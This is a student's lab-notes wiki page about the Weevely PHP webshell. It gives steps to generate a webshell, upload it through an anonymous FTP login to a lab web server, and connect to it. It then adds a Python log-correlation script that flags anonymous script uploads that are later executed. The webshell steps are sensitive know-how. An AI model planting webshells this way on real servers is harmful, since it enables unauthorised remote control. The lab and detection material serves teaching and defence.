Lab 8.2: Reverse Shells - squatchulator/Tech-Journal GitHub Wiki

Lab 8.1 - Weevely

Tool Usage has additional help on how to use Weevely.

This lab is primarily focused on exploring the stealthy webshell, Weevely. It is a tool built into Kali Linux that simplifies webshell use by giving the user a command prompt rather than requiring commands to be passed via a URL. Decoding the packet captures was a really interesting way to show the difference between the webshell we created last week and Weevely webshells: Weevely encrypts its traffic, so you cannot tell from a packet capture what is going on or which commands are being passed.

Weevely

  • First, make sure Weevely is installed. It can be installed with sudo apt-get install weevely
  • Once installed, generate a Weevely file with weevely generate <password> <filename>.php
  • Now, you need to upload the PHP file via FTP to the web server.
    • Start by using ftp <address> and log in. In our case, you can log in as anonymous with password guest.
    • Navigate to /upload, and run put <filename>.php to upload the Weevely file.
  • Now exit the FTP server, and run weevely http://<address>/upload/<filename>.php <password> to initiate the webshell.
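
Because the Weevely traffic itself is unreadable in a packet capture, the steps above are easier to spot from server logs: an anonymous FTP upload of a .php file followed by HTTP requests to that same path. The following is an added example, not part of the original lab; the log lines are constructed, and it assumes xferlog-format FTP logging, common-log-format web logs, and that the FTP path maps directly to the URL path as it does for /upload in this lab.

```python
import re

# Constructed sample logs (not from the lab); addresses and file names are made up.
# Assumption: the FTP path (/upload/...) is served at the same URL path.
XFERLOG = """\
Mon Mar 11 10:01:07 2024 1 10.0.0.50 742 /upload/notes.txt b _ i a guest ftp 0 * c
Mon Mar 11 10:02:15 2024 1 10.0.0.50 781 /upload/agent.php b _ i a guest ftp 0 * c
Mon Mar 11 10:03:40 2024 1 10.0.0.60 9120 /pub/readme.txt b _ o a guest ftp 0 * c
"""
ACCESS_LOG = """\
10.0.0.50 - - [11/Mar/2024:10:02:58 +0000] "POST /upload/agent.php HTTP/1.1" 200 412
10.0.0.50 - - [11/Mar/2024:10:03:02 +0000] "POST /upload/agent.php HTTP/1.1" 200 388
10.0.0.70 - - [11/Mar/2024:10:04:00 +0000] "GET /index.html HTTP/1.1" 200 1043
"""
SCRIPT_EXT = (".php", ".phtml", ".phar")
REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def anonymous_script_uploads(xferlog):
    """Return {path: uploader_ip} for script files uploaded by anonymous FTP users."""
    found = {}
    for line in xferlog.splitlines():
        f = line.split()
        if len(f) < 18:  # a complete xferlog record has 18 whitespace-separated fields
            continue
        host, path, direction, access = f[6], f[8], f[11], f[12]
        # direction "i" = incoming (upload); access mode "a" = anonymous login
        if direction == "i" and access == "a" and path.lower().endswith(SCRIPT_EXT):
            found[path] = host
    return found

def executed_uploads(xferlog, access_log):
    """Correlate anonymous script uploads with successful HTTP requests to the same path."""
    uploads = anonymous_script_uploads(xferlog)
    hits = {}
    for line in access_log.splitlines():
        m = REQ.match(line)
        if not m:
            continue
        client, method, url, status = m.groups()
        path = url.split("?", 1)[0]  # ignore any query string
        if path in uploads and status.startswith("2"):
            rec = hits.setdefault(path, {"uploader": uploads[path], "clients": set(), "requests": 0})
            rec["clients"].add(client)
            rec["requests"] += 1
    return hits

if __name__ == "__main__":
    for path, rec in executed_uploads(XFERLOG, ACCESS_LOG).items():
        print(path, rec)
```

Any hit means a file written by an unauthenticated FTP user was executed by the web server, which is the condition to remove: the upload directory should not be both anonymously writable and PHP-executable.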
